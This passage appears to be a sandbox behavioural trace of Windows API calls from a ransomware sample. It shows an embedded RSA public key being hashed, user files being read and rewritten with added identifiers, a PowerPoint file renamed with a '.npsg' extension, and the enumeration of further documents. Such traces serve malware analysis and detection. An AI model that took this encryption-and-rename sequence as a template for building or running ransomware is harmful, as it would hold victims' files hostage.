(HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.669] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.669] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xac18, lpOverlapped=0x0) returned 1 [0236.669] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0236.669] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.670] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0236.670] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0236.670] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0236.670] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0236.670] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0236.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0236.671] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0236.671] GetLastError () returned 0x0 [0236.671] CryptDestroyHash (hHash=0x33f0408) returned 1 [0236.671] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0236.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.671] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0236.671] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0236.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.671] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0236.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0236.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xac20) returned 0x3b81cd0 [0236.671] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0236.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0236.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0236.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0236.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95620 [0236.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400248 [0236.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b95668 [0236.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400260 [0236.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400290 [0236.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34002f0 [0236.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34002a8 [0236.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0236.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b8d7c0 [0236.672] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b8d7c0, Size=0x218) returned 0x3b90810 [0236.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x3b8c8f8 [0236.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400290 | out: hHeap=0x620000) returned 1 [0236.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002a8 | out: hHeap=0x620000) returned 1 [0236.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002f0 | out: hHeap=0x620000) returned 1 [0236.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0236.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8c8f8 | out: hHeap=0x620000) returned 1 [0236.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34002f0 [0236.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0236.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34002a8 [0236.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400290 [0236.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0236.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7bb78 [0236.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0236.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0236.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0236.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0236.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0236.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0236.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0236.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002a8 | out: hHeap=0x620000) returned 1 [0236.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400290 | out: hHeap=0x620000) returned 1 [0236.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002f0 | out: hHeap=0x620000) returned 1 [0236.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0236.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.673] GetCurrentThreadId () returned 0x5b4 [0236.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0236.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b79108 [0236.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0236.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0236.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0236.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0236.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0236.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.673] GetCurrentThreadId () returned 0x5b4 [0236.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0236.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0236.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0236.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0236.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4dd8 [0236.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0236.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0236.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34002f0 [0236.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0236.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0236.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0236.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0236.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0236.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0236.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400290 [0236.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0236.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0236.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0236.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0236.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0236.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34002a8 [0236.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0236.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0236.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0236.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400278 [0236.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0236.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400308 [0236.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0236.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0236.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34002d8 [0236.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0236.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34002c0 [0236.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400320 [0236.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002c0 | out: hHeap=0x620000) returned 1 [0236.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34002c0 [0236.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002d8 | out: hHeap=0x620000) returned 1 [0236.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0236.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0236.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0236.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0236.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0236.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400290 | out: hHeap=0x620000) returned 1 [0236.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400290 [0236.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0236.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0236.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002f0 | out: hHeap=0x620000) returned 1 [0236.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0236.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400320 | out: hHeap=0x620000) returned 1 [0236.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x346fd28 [0236.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0236.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b948 [0236.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0236.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0236.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400290 | out: hHeap=0x620000) returned 1 [0236.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b7a060 [0236.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0236.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fd28 | out: hHeap=0x620000) returned 1 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002c0 | out: hHeap=0x620000) returned 1 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400308 | out: hHeap=0x620000) returned 1 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34002a8 | out: hHeap=0x620000) returned 1 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400278 | out: hHeap=0x620000) returned 1 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400260 | out: hHeap=0x620000) returned 1 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b95668 | out: hHeap=0x620000) returned 1 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0236.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4dd8 | out: hHeap=0x620000) returned 1 [0236.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0236.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0236.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0236.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0236.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0236.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0236.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0236.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0236.677] WriteFile (in: hFile=0x644, lpBuffer=0x3b81cd0*, nNumberOfBytesToWrite=0xac13, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81cd0*, lpNumberOfBytesWritten=0x39afb14*=0xac13, lpOverlapped=0x0) returned 1 [0236.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b81cd0 | out: hHeap=0x620000) returned 1 [0236.677] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xac18, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.677] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0236.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0236.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7c900 [0236.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b7a060 [0236.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b7a060, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0236.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b947f8 [0236.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a060 | out: hHeap=0x620000) returned 1 [0236.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7c900 | out: hHeap=0x620000) returned 1 [0236.678] WriteFile (in: hFile=0x644, lpBuffer=0x3b947f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b947f8*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0236.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0236.678] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.678] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0236.678] CloseHandle (hObject=0x644) returned 1 [0236.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0236.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b8f7a8 [0236.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0236.679] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H_G Ub15e5ZAiG.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h_g ub15e5zaig.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\H_G Ub15e5ZAiG.pptx.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\h_g ub15e5zaig.pptx.npsg")) returned 1 [0236.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8f7a8 | out: hHeap=0x620000) returned 1 [0236.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0236.680] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0236.681] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9054580, ftCreationTime.dwHighDateTime=0x1d54858, ftLastAccessTime.dwLowDateTime=0x9f170a10, ftLastAccessTime.dwHighDateTime=0x1d5c033, ftLastWriteTime.dwLowDateTime=0x9f170a10, ftLastWriteTime.dwHighDateTime=0x1d5c033, nFileSizeHigh=0x0, nFileSizeLow=0x14010, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Id-3qUuhoEJj.docx", cAlternateFileName="ID-3QU~1.DOC")) returned 1 [0236.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7c900 [0236.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0236.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7c900 | out: hHeap=0x620000) returned 1 [0236.681] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Id-3qUuhoEJj.docx") returned=".docx" 